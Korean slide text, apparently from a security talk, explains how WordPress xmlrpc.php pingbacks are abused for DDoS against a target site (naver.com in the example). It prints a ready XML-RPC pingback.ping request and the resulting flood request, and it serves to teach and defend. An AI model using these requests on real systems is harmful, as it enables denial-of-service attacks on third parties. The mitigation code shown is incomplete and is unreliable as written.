Word Press DDOS DDOS naver com Word Press

Word. Press 를 이용한 DDOS 공격 ■ DDOS 공격 개요 (naver. com 을 공격 한다고 가정) -공격자는 전세계 Word. Press 사이트의 xmlrpc. php를 호출하여 www. naver. com으로 pingback Request가 발생하도 록 유도 ① xmlrpc. php에 pingback 데이터를 송 신 ② victim site로 pingback 데이터가 송신됨 ③ 다수에 의해 Get 플러딩 공격이 발생 출처 : http: //d. hatena. ne. jp/Kango/20140313/1394673178

HTTP Request Sample ■ 해커가 취약한 Word. Press 사이트를 대상으로 Ping. Back을 유도하는 Request POST /Word. Press-3. 5/xmlrpc. php HTTP/1. 1 Accept: application/x-shockwave-flash, application/msword, */* Accept-Language: zh-cn User-Agent: Mozilla/4. 0 (compatible; MSIE 8. 0; Windows NT 5. 1; Trident/4. 0; . NET CLR 2. 0. 50727; . NET CLR 3. 5. 30729) Accept-Encoding: gzip, deflate Host: xxx. wordpress. com Content-Length: 301 <? xml version="1. 0" encoding="iso-8859 -1"? > <method. Call> 공격 대상 URL <method. Name>pingback. ping</method. Name> <params> <param><value><string>http: //www. naver. com/</string></value></param> <param><value><string>http: //xxx. wordpress. com/Word. Press-3. 5/? p=3</string></value> </param> Wordpress로 제작된 사이트 URL ■ www. naver. com에게 보내는 Ping. Back DDOS Http Request GET / HTTP/1. 1 Host: www. qoo 10. my User-Agent: Word. Press/4. 0 -RC 3; http: //xxxx. wordpress. com Accept-Encoding: deflate; q=1. 0, compress; q=0. 5, gzip; q=0. 5 Accept: */*

대응방안 ■ Ping. Back 기능을 제거하여 DDOS의 Agent로 악용되는 것을 방지 -xmlrpc. php 에 Ping. Back을 Disable 하는 코드를 추가 예: add_filter(‘wp_headers’, function($headers, $wp_query){ if(isset($headers[‘X-Pingback’])){ unset($headers[‘X-Pingback’]); } ■ 전세계 16만 2천개의 Word. Press사이트가 DDOS Agent로 악용된다는 보고 출처 : http: //blog. sucuri. net/2014/03/more-than-162000 -wordpress-sites-used-for-distributed-denial-of-serviceattack. html